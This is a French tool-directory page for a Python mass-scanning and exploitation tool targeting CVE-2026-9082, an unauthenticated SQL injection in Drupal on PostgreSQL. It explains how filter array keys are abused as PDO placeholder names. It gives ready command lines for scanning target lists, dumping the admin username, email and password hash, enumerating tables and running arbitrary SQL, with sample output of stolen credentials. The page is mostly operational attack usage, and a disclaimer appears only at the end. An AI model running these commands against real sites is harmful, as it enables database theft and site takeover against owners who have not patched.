Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
drupal-jsonapi-sqli-scanner — Scanner: CVE-2026-9082 Drupal PostgreSQL SQLi via JSON:API — scanner Python pour une SQLi non authentifiée menant à une RCE (CISA KEV) | Kitploit
Outils/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
Scanners de VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsTests d'IntrusionRed TeamingSécurité des Bases de Données
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

Scanner: CVE-2026-9082 Drupal PostgreSQL SQLi via JSON:API — scanner Python pour une SQLi non authentifiée menant à une RCE (CISA KEV)

Voir le dépôt
216il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — Injection SQL dans Drupal (PostgreSQL)

Outil de scan de masse et d'exploitation

Injection SQL non authentifiée dans le noyau Drupal (PostgreSQL)
Injection de clé de tableau de filtre JSON:API via abus du nom de placeholder PDO


Vue d'ensemble

CVE-2026-9082 est une vulnérabilité d'injection SQL hautement critique dans le noyau Drupal touchant tous les sites basés sur PostgreSQL exécutant Drupal 8.0 à 11.3.9. Ajoutée au catalogue CISA Known Exploited Vulnerabilities (KEV) le 2026-05-22 — activement exploitée dans la nature.

Impact

SévéritéCVSSAuthentification requiseVecteur d'attaque
Critique9.8+AucuneHTTP (JSON:API)
  • Exfiltration de données — extraire des bases de données, des utilisateurs, des empreintes de mots de passe
  • Élévation de privilèges — créer des comptes administrateur, modifier du contenu
  • Exécution de code à distance — dans certaines configurations via pg_exec() ou COPY ... PROGRAM

Versions concernées

StatutVersions
❌ VulnérableDrupal 8.0.0 → 11.3.9 (backend PostgreSQL)
✅ Corrigé11.3.10, 11.2.12, 10.6.9, 10.5.10

Comment ça fonctionne

La faille se situe dans core/modules/pgsql/src/EntityQuery/Condition.php. La méthode translateCondition() utilise des clés de tableau contrôlées par l'utilisateur issues des paramètres de filtre JSON:API pour construire les noms de placeholders PDO. PDO ne reconnaît comme noms de placeholders que [a-zA-Z0-9_], de sorte que tout suffixe après ) devient du SQL littéral injecté dans la requête.

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

Fonctionnalités

  • ✅ Scanner de masse — scanne des centaines de cibles simultanément
  • ✅ Mode cible unique — vérifie des sites Drupal individuels
  • ✅ Détection temporelle — confirmation d'injection SQL aveugle via pg_sleep()
  • ✅ Détection booléenne — comparaison du nombre de lignes
  • ✅ Extraction de version — identifie la version de PostgreSQL
  • ✅ Informations sur la base — extrait l'utilisateur courant et le nom de la base
  • ✅ Extraction des identifiants admin — nom d'utilisateur, e-mail, hash du mot de passe (uid=1)
  • ✅ Liste des tables — énumère toutes les tables publiques
  • ✅ Requêtes SQL personnalisées — exécute n'importe quelle requête d'extraction
  • ✅ Prise en charge des proxys — acheminement via Burp Suite ou similaire
  • ✅ Sortie vers fichier — enregistre les résultats du scan de masse
  • ✅ Sortie console colorée — résultats faciles à lire

Installation

Prérequis

  • Python 3.8+
  • pip (gestionnaire de paquets Python)

Installer les dépendances

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

Et voilà ! Une seule dépendance — requests.


Utilisation

🕵️ Vérifier une cible unique

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Scanner en masse plusieurs cibles

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

Format targets.txt :

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 Extraire la version de PostgreSQL

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Extraire les informations de la base

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Extraire les identifiants admin (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 Lister toutes les tables

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Requête SQL personnalisée

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Enregistrer les résultats dans un fichier

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Utiliser un proxy (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Personnaliser les délais

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Référence des commandes

OptionDescription
-u, --urlURL de la cible unique
-f, --fileFichier contenant les cibles (une par ligne)
-o, --outputEnregistre les résultats du scan dans un fichier
--checkVérifie si la cible est vulnérable
--versionExtrait la version de PostgreSQL
--dbinfoExtrait l'utilisateur de la base et le nom de la base
--adminExtrait les identifiants admin Drupal (uid=1)
--tablesListe toutes les tables de la base de données
--queryRequête d'extraction SQL personnalisée
--threadsThreads pour le scan de masse (défaut : 20)
--timeoutDélai d'expiration des requêtes HTTP (défaut : 30 s)
--delayDélai pg_sleep pour la détection (défaut : 5 s)
--no-ssl-verifyIgnore la vérification du certificat TLS
--proxyProxy HTTP (p. ex., http://127.0.0.1:8080)

Exemple de sortie

Cible vulnérable

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Extraction des identifiants admin

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

Références

SourceLien
Avis de sécurité DrupalSA-CORE-2026-004
CISA KEVCVE-2026-9082
Commit du correctifea9524d9
Entrée NVDCVE-2026-9082
DécouvreurMichael Maturi

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés, à des fins éducatives et à la recherche éthique.

L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou de tout dommage causé par ce programme.


Auteur

Ridhin V A (@ridhinva) — chasseur de bug bounty et chercheur en sécurité

Créé parce que CISA KEV a signalé une exploitation active dans la nature. Corrigez vos sites Drupal.

Télécharger l’outil